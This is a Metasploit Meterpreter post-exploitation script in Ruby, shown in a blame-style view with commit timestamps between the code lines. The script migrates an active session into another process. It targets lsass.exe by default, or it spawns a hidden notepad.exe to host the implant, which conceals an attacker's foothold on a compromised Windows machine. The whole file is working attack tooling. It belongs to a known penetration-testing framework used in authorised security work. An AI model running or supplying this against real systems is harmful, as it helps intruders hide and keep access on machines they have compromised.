2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2006-09-19 03:15:25 +00:00
|
|
|
#
|
2010-05-03 17:13:09 +00:00
|
|
|
# Simple example script that migrates to a specific process by name.
|
2006-09-19 03:15:25 +00:00
|
|
|
# This is meant as an illustration.
|
|
|
|
#
|
|
|
|
|
2009-12-15 05:10:33 +00:00
|
|
|
spawn = false
|
2010-01-19 17:03:53 +00:00
|
|
|
target = nil
|
2009-12-15 05:10:33 +00:00
|
|
|
|
2009-11-04 16:35:51 +00:00
|
|
|
opts = Rex::Parser::Arguments.new(
|
2009-12-15 05:10:33 +00:00
|
|
|
"-h" => [ false,"Help menu." ],
|
|
|
|
"-f" => [ false, "Launch a process and migrate into the new process"]
|
2009-11-04 16:35:51 +00:00
|
|
|
)
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
2009-12-15 05:10:33 +00:00
|
|
|
when "-f"
|
|
|
|
spawn = true
|
2009-11-04 16:35:51 +00:00
|
|
|
when "-h"
|
|
|
|
print_line("")
|
|
|
|
print_line("USAGE: run migrate [process name]")
|
|
|
|
print_line("EXAMPLE: run migrate explorer.exe")
|
|
|
|
print_line(opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
2009-12-15 05:10:33 +00:00
|
|
|
else
|
|
|
|
target = val
|
2009-11-04 16:35:51 +00:00
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
|
2006-09-19 03:15:25 +00:00
|
|
|
|
|
|
|
|
|
|
|
server = client.sys.process.open
|
|
|
|
|
|
|
|
print_status("Current server process: #{server.name} (#{server.pid})")
|
|
|
|
|
2009-12-15 05:10:33 +00:00
|
|
|
target_pid = nil
|
|
|
|
|
|
|
|
if ! spawn
|
|
|
|
# Get the target process name
|
|
|
|
target ||= "lsass.exe"
|
|
|
|
print_status("Migrating to #{target}...")
|
2010-05-03 17:13:09 +00:00
|
|
|
|
2009-12-15 05:10:33 +00:00
|
|
|
# Get the target process pid
|
|
|
|
target_pid = client.sys.process[target]
|
2006-09-19 03:15:25 +00:00
|
|
|
|
2009-12-15 05:10:33 +00:00
|
|
|
if not target_pid
|
|
|
|
print_error("Could not access the target process")
|
|
|
|
print_status("Spawning a notepad.exe host process...")
|
|
|
|
note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
|
|
|
|
target_pid = note.pid
|
|
|
|
end
|
|
|
|
else
|
|
|
|
target ||= "notepad.exe"
|
|
|
|
print_status("Spawning a #{target} host process...")
|
|
|
|
newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
|
|
|
|
target_pid = newproc.pid
|
|
|
|
if not target_pid
|
|
|
|
print_error("Could not create a process around #{target}")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
2006-09-19 03:15:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Do the migration
|
2009-12-15 05:10:33 +00:00
|
|
|
print_status("Migrating into process ID #{target_pid}")
|
2006-09-19 03:15:25 +00:00
|
|
|
client.core.migrate(target_pid)
|
|
|
|
server = client.sys.process.open
|
2008-11-04 06:57:26 +00:00
|
|
|
print_status("New server process: #{server.name} (#{server.pid})")
|